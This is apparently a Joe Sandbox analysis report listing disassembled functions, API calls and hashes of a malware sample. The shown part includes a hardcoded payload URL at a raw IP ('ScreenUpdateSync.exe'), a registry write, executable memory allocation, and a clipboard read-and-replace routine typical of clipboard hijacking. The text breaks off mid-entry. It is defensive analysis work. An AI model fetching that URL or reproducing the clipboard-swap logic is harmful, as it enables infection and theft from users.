                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                      • String ID:
                                                      • API String ID: 1687354797-0
                                                      • Opcode ID: 9bbf6c831fd912da87baf57c36a4887fcd0ef6c58bda06b470faafc8a7fe9ad1
                                                      • Instruction ID: f33cc807fcc9f1471242bb563c47589eb39ac817f40e532f8edcf8bb099f1083
                                                      • Opcode Fuzzy Hash: 9bbf6c831fd912da87baf57c36a4887fcd0ef6c58bda06b470faafc8a7fe9ad1
                                                      • Instruction Fuzzy Hash: E8216272C05208AADF15EBE9D845BDEB7F8AF08318F54407FE500B72C1DB7C8A448A69
                                                      Function 0042DFD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetLastError.KERNEL32(00457910,00000010,00000003,00431F6D), ref: 0042DFE3
                                                      • ExitThread.KERNEL32 ref: 0042DFEA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorExitLastThread
                                                      • String ID: "1@$W(@
                                                      • API String ID: 1611280651-1069126892
                                                      • Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                      • Instruction ID: e32c967c61cfab7ac25fd58fcb876b017a95a0f88e1656cb846294c295b13e50
                                                      • Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                      • Instruction Fuzzy Hash: 32F0C871A00614AFDB04AFB1D806B6E3B70FF49715F10056EF4015B392CBB96955DB68
                                                      Function 00405816 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • std::_Cnd_initX.LIBCPMT ref: 00405832
                                                      • __Cnd_signal.LIBCPMT ref: 0040583E
                                                      • std::_Cnd_initX.LIBCPMT ref: 00405853
                                                      • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 0040585A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                      • String ID:
                                                      • API String ID: 2059591211-0
                                                      • Opcode ID: 4bc96931a50e530a97df949a93d6c22699e5ffe5761425610e17c207007b84ce
                                                      • Instruction ID: 83daef3eed95e24e3e949fc9d85496ede2dd42c7ef54912cf65e476956e81272
                                                      • Opcode Fuzzy Hash: 4bc96931a50e530a97df949a93d6c22699e5ffe5761425610e17c207007b84ce
                                                      • Instruction Fuzzy Hash: 27F08C324007019BE7313B63C807B1A73A0AF00329F54883EF056769E2DFBEA8594A9D
                                                      Function 00402971 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 435 402971-4029dc call 426840 call 42a35b call 42b464 call 402834 444 4029ea-402a04 call 404349 call 40f8e5 435->444 445 4029de-4029e1 435->445 445->444 447 4029e3-4029e7 445->447 447->444 448 4029e9 447->448 448->444
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 004029A0
                                                      • __fassign.LIBCMT ref: 004029B0
                                                        • Part of subcall function 00402834: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402917
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                      • String ID: %+@
                                                      • API String ID: 2843524283-3245072864
                                                      • Opcode ID: 94cb3b79f98ead159861d7158de155055882d78918291c844945256c2dbf7a38
                                                      • Instruction ID: 90ed0d1f3f4a6b01ffd6285d26a76915e69f928962b748037eb715055e84f5de
                                                      • Opcode Fuzzy Hash: 94cb3b79f98ead159861d7158de155055882d78918291c844945256c2dbf7a38
                                                      • Instruction Fuzzy Hash: 3301FEB1E0011C96DB24E725EC46BEF77649F45308F0401FFD609E71C1D9795E45CA84
                                                      Function 0042E124 Relevance: 4.6, APIs: 3, Instructions: 54threadCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 452 42e124-42e12f 453 42e131-42e143 call 42ead9 call 42a5ad 452->453 454 42e145-42e158 call 42e0db 452->454 470 42e195-42e198 453->470 459 42e186 454->459 460 42e15a-42e177 CreateThread 454->460 464 42e188-42e194 call 42e04d 459->464 462 42e199-42e19e 460->462 463 42e179-42e185 GetLastError call 42eaa3 460->463 468 42e1a0-42e1a3 462->468 469 42e1a5-42e1a7 462->469 463->459 464->470 468->469 469->464
                                                      APIs
                                                      • CreateThread.KERNEL32(?,?,Function_0002DFD0,00000000,?,?), ref: 0042E16D
                                                      • GetLastError.KERNEL32(?,?,?,?,?,0040CF24,00000000,00000000,?,?,00000000,?), ref: 0042E179
                                                      • __dosmaperr.LIBCMT ref: 0042E180
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: CreateErrorLastThread__dosmaperr
                                                      • String ID:
                                                      • API String ID: 2744730728-0
                                                      • Opcode ID: 6417039c3a419c6a23e66f93a220d1850b71fa34b27fbb0fc498c45cdaeb281c
                                                      • Instruction ID: c347c8df55ddf1e8bce98cd2287a220773076a2fddba34e4051567eb06b695c8
                                                      • Opcode Fuzzy Hash: 6417039c3a419c6a23e66f93a220d1850b71fa34b27fbb0fc498c45cdaeb281c
                                                      • Instruction Fuzzy Hash: 4401D236300229BBDB159FA3EC059AF3B69EF81320F40003AF90586210DB798921D7A8
                                                      Function 00434765 Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 473 434765-43477d call 439931 476 434790-4347a6 SetFilePointerEx 473->476 477 43477f-434784 call 42ead9 473->477 479 4347b7-4347c1 476->479 480 4347a8-4347b5 GetLastError call 42eaa3 476->480 484 43478a-43478e 477->484 483 4347c3-4347d8 479->483 479->484 480->484 485 4347dd-4347e2 483->485 484->485
                                                      APIs
                                                      • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDEB,00000000,00000002,0040DDEB,00000000,?,?,?,00434814,00000000,00000000,0040DDEB,00000002), ref: 0043479E
                                                      • GetLastError.KERNEL32(?,00434814,00000000,00000000,0040DDEB,00000002,?,0042C171,?,00000000,00000000,00000001,?,0040DDEB,?,0042C226), ref: 004347A8
                                                      • __dosmaperr.LIBCMT ref: 004347AF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileLastPointer__dosmaperr
                                                      • String ID:
                                                      • API String ID: 2336955059-0
                                                      • Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                      • Instruction ID: 8d7e534b68e51039b064944c18aa619c86eb292ce30b22a5ce389d7836f0c17b
                                                      • Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                      • Instruction Fuzzy Hash: 9A012836710514ABCB159FAADC058EE7B29EFCA730F24021AF81597290EB74ED518B94
                                                      Function 00402BBE Relevance: 4.5, APIs: 3, Instructions: 41registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 487 402bbe-402bea RegCreateKeyExW 488 402c00-402c03 487->488 489 402bec-402bfe RegSetValueExW 487->489 490 402c05-402c08 RegCloseKey 488->490 491 402c0e-402c14 488->491 489->488 490->491
                                                      APIs
                                                      • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE0
                                                      • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF8
                                                      • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402C08
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateValue
                                                      • String ID:
                                                      • API String ID: 1818849710-0
                                                      • Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                      • Instruction ID: d64ed0a5138aab8bb5e73f7f055b5b91d97832046820ac466d775150ee78820e
                                                      • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                      • Instruction Fuzzy Hash: E7F054B650011CFFEB214F95DD89EAFBA7CEB457E9F100175FA01B2150D6B19E009664
                                                      Function 0042E084 Relevance: 4.5, APIs: 3, Instructions: 31threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 492 42e084-42e091 call 431f6e 495 42e093-42e096 ExitThread 492->495 496 42e09c-42e0a4 492->496 496->495 497 42e0a6-42e0aa 496->497 498 42e0b1-42e0b7 497->498 499 42e0ac call 435506 497->499 501 42e0c4-42e0ca 498->501 502 42e0b9-42e0bb 498->502 499->498 501->495 504 42e0cc-42e0ce 501->504 502->501 503 42e0bd-42e0be CloseHandle 502->503 503->501 504->495 505 42e0d0-42e0da FreeLibraryAndExitThread 504->505
                                                      APIs
                                                        • Part of subcall function 00431F6E: GetLastError.KERNEL32(?,?,?,0042EADE,00434D8C,?,00431F18,00000001,00000364,?,0042DFF5,00457910,00000010), ref: 00431F73
                                                        • Part of subcall function 00431F6E: _free.LIBCMT ref: 00431FA8
                                                        • Part of subcall function 00431F6E: SetLastError.KERNEL32(00000000), ref: 00431FDC
                                                      • ExitThread.KERNEL32 ref: 0042E096
                                                      • CloseHandle.KERNEL32(?,?,?,0042E1B6,?,?,0042E02D,00000000), ref: 0042E0BE
                                                      • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1B6,?,?,0042E02D,00000000), ref: 0042E0D4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                      • String ID:
                                                      • API String ID: 1198197534-0
                                                      • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                      • Instruction ID: b2ee31e33066f08c21064793e861ac71cdb60266893f8cc669943c0e7c2b87c9
                                                      • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                      • Instruction Fuzzy Hash: D9F054306007307BD7315F37E80865B7E986F05B24F444A25FA24C36E1D768DD42869D
                                                      Function 004023AB Relevance: 3.1, APIs: 2, Instructions: 129windowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 506 4023ab-4023b9 507 402572-402574 PostQuitMessage 506->507 508 4023bf-4023c4 506->508 511 40257a-40257f 507->511 509 4023c6-4023d8 DefWindowProcW 508->509 510 4023dd-4023e4 508->510 509->511 512 4023e6 call 401db1 510->512 513 4023eb-4023f2 510->513 512->513 513->511 515 4023f8-402570 call 4010ba call 402a05 513->515 515->511
                                                      APIs
                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 004023D2
                                                      • PostQuitMessage.USER32(00000000), ref: 00402574
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: MessagePostProcQuitWindow
                                                      • String ID:
                                                      • API String ID: 3873111417-0
                                                      • Opcode ID: 82f44b76c14ec8efbf4c7d3be5e983ce5a0703e3b5b257b4754238f4299c4704
                                                      • Instruction ID: bd154e6284a73d9c96f0bb0b5cf215997dec60b9e2ffb7077fd2f9e149d03c68
                                                      • Opcode Fuzzy Hash: 82f44b76c14ec8efbf4c7d3be5e983ce5a0703e3b5b257b4754238f4299c4704
                                                      • Instruction Fuzzy Hash: 5241FD15AA4384A4E630EFA5BC55B2537B0FF64762F10253BE528CB2F2E3B68540C74E
                                                      Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 105sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNEL32(00001D1B), ref: 00401562
                                                        • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                        • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$Sleep
                                                      • String ID: http://176.113.115.37/ScreenUpdateSync.exe
                                                      • API String ID: 3358372957-2681926500
                                                      • Opcode ID: b76e47030a2c47958d9b71dc8cf2ba090e0f0ec640c90ebfa7a7ba8d14f2146e
                                                      • Instruction ID: ace68ffdce9ad84b7101d27a91fbc7a6158b3f12708c11eec33b656b8e876d20
                                                      • Opcode Fuzzy Hash: b76e47030a2c47958d9b71dc8cf2ba090e0f0ec640c90ebfa7a7ba8d14f2146e
                                                      • Instruction Fuzzy Hash: 4D318C15AA538094E230CFA5BC66B252330FFA8752F51653BD60CCB2F2E3A19583C75E
                                                      Function 046D0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000400,?,?,046D0223,?,?), ref: 046D0E19
                                                      • SetErrorMode.KERNEL32(00000000,?,?,046D0223,?,?), ref: 046D0E1E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                      • Instruction ID: af0e8136091a2cdf0037daab132eba0617c6eeb2d2939769779a69df2bd63dac
                                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                      • Instruction Fuzzy Hash: 68D0123154512877D7102A94DC09BCD7B1CDF05B66F008011FB0DD9180C770954046E5
                                                      Function 00434196 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                      • Instruction ID: 5a7b2c84d62ad658203a61991ba47339364d8092704fd253d31609ac0f8472cb
                                                      • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                      • Instruction Fuzzy Hash: 2251B331A00218AFDB10DF69C840BEA7BA1EFC9364F19919AF8099B392C775FD42C754
                                                      Function 004036B5 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock
                                                      • String ID:
                                                      • API String ID: 2638373210-0
                                                      • Opcode ID: a181b7be805d7fa44ac39242885525ea8222ab64a8fcafdecb561f0e5ce962c8
                                                      • Instruction ID: 9bd68947439e0ebb8ec9c9da6f1ebb3266b3b40cb9df12d6a59bf639d1a3d955
                                                      • Opcode Fuzzy Hash: a181b7be805d7fa44ac39242885525ea8222ab64a8fcafdecb561f0e5ce962c8
                                                      • Instruction Fuzzy Hash: 09317CF5604716AFC710DE29C88091ABFA8BF84356F04C63FF854A7391D739DA548B8A
                                                      Function 00402834 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402917
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Ios_base_dtorstd::ios_base::_
                                                      • String ID:
                                                      • API String ID: 323602529-0
                                                      • Opcode ID: 42722672a66a49ce9ba729d8d5a11b6b274ac21bb896f056569fbc7f46f120ab
                                                      • Instruction ID: fd4b2128866d0e84e09fbcca1a55060ba5f89e368c9dd26e662fbef8df430bae
                                                      • Opcode Fuzzy Hash: 42722672a66a49ce9ba729d8d5a11b6b274ac21bb896f056569fbc7f46f120ab
                                                      • Instruction Fuzzy Hash: AC310AB4D00219AFDB14EFA5C881AEDBBB4BF48304F5081BEE515B3281DB786A48DF54
                                                      Function 00403CD8 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3_catch
                                                      • String ID:
                                                      • API String ID: 3886170330-0
                                                      • Opcode ID: 8a35a6a311719fc8f305abf41c451562b85f8561cae7fd66b88796062af0805e
                                                      • Instruction ID: 879880b0c4f25b780129691f851e4e3dd9929a9e2b67da2182dc959f14ef4ac1
                                                      • Opcode Fuzzy Hash: 8a35a6a311719fc8f305abf41c451562b85f8561cae7fd66b88796062af0805e
                                                      • Instruction Fuzzy Hash: AB216D70600615EFCB11CF55C584E9EBBB5BF84705F14816EE405AB391C778AE50DF94
                                                      Function 00432795 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: __wsopen_s
                                                      • String ID:
                                                      • API String ID: 3347428461-0
                                                      • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                      • Instruction ID: c4c31d86981b08a4326d9d07fefb9558e2d41883e343640ddfed44868bdc2be0
                                                      • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                      • Instruction Fuzzy Hash: A411187590420AAFCF05DF58E94199B7BF4FF48314F10406AF809AB311D771EA15CBA9
                                                      Function 0043CFDB Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                      • Instruction ID: f695aadca84356b0d8b9a61274b7bbdfef1310b8a9dd6365b425cc03820087b4
                                                      • Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                      • Instruction Fuzzy Hash: B3F09A32810009BBCF115E96DC01DDB3F6AEF8D328F10011AF918A2150DA3ACA21ABA4
                                                      Function 004336B7 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,0040D886,00000000,?,004267AE,00000002,00000000,00000000,00000000,?,0040CD37,0040D886,00000004,00000000,00000000,00000000), ref: 004336E9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                      • Instruction ID: fa7d64e0cb14044348f9bcc553febe5de5c9831e98ae767a6f681f11bdbd1c75
                                                      • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                      • Instruction Fuzzy Hash: 6BE0E5312002217ED6302F67AC07B5B36489F4ABA6F046133FD0592390DBACDE0181AD
                                                      Function 0040FB22 Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004103D7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throw
                                                      • String ID:
                                                      • API String ID: 2005118841-0
                                                      • Opcode ID: b2a61ea650375c75c53941cf1669b74608d6a6abec66458302ae90db8424a762
                                                      • Instruction ID: 76c106b1e19f55d0871e75195d63a97b43a3e3a633cf3d3d8d8c178ac06e9a64
                                                      • Opcode Fuzzy Hash: b2a61ea650375c75c53941cf1669b74608d6a6abec66458302ae90db8424a762
                                                      • Instruction Fuzzy Hash: 15E02B3050020DB6CB147665EC1585D33385A00315B60413BBD24A14D1EF78E59E888E
                                                      Function 00404349 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Deallocate
                                                      • String ID:
                                                      • API String ID: 1075933841-0
                                                      • Opcode ID: d86d5cecc1e96241595adfcfb1704e736ddb91d28ce44d5c5f584f8131ffb7cb
                                                      • Instruction ID: 9066955a54128b228038de65561ddb16510e1d4daca8eda005544cef135c0263
                                                      • Opcode Fuzzy Hash: d86d5cecc1e96241595adfcfb1704e736ddb91d28ce44d5c5f584f8131ffb7cb
                                                      • Instruction Fuzzy Hash: 07D06771518612CEE374DF79E444656B7E4EF44710B20892FE4D9D2694E6759880CB44
                                                      Function 0043CD1A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,00000000,?,0043D0F5,?,?,00000000,?,0043D0F5,00000000,0000000C), ref: 0043CD37
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                      • Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
                                                      • Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                      • Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
                                                      Function 02C0DE3D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 02C0DE8E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091760416.0000000002C0D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C0D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2c0d000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                      • Instruction ID: 659db21d75cd6b4236a2990a8ff87d960c26659eb64a66354d5e760e4c4646bb
                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                      • Instruction Fuzzy Hash: 58113C79A00208EFDB01DF98C985E99BBF5EF08350F0580A4F9489B362D371EA50EF80

                                                      Non-executed Functions

                                                      Function 046D1946 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 152clipboardsleepmemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 046D1951
                                                      • Sleep.KERNEL32(00001541,0000004C), ref: 046D195B
                                                        • Part of subcall function 046DCE8D: _strlen.LIBCMT ref: 046DCEA4
                                                      • OpenClipboard.USER32(00000000), ref: 046D1988
                                                      • GetClipboardData.USER32(00000001), ref: 046D1998
                                                      • _strlen.LIBCMT ref: 046D19B4
                                                      • _strlen.LIBCMT ref: 046D19E3
                                                      • _strlen.LIBCMT ref: 046D1B27
                                                      • EmptyClipboard.USER32 ref: 046D1B3D
                                                      • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 046D1B4A
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 046D1B74
                                                      • SetClipboardData.USER32(00000001,00000000), ref: 046D1B7D
                                                      • GlobalFree.KERNEL32(00000000), ref: 046D1B84
                                                      • CloseClipboard.USER32 ref: 046D1BA8
                                                      • Sleep.KERNEL32(000002D2), ref: 046D1BB3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
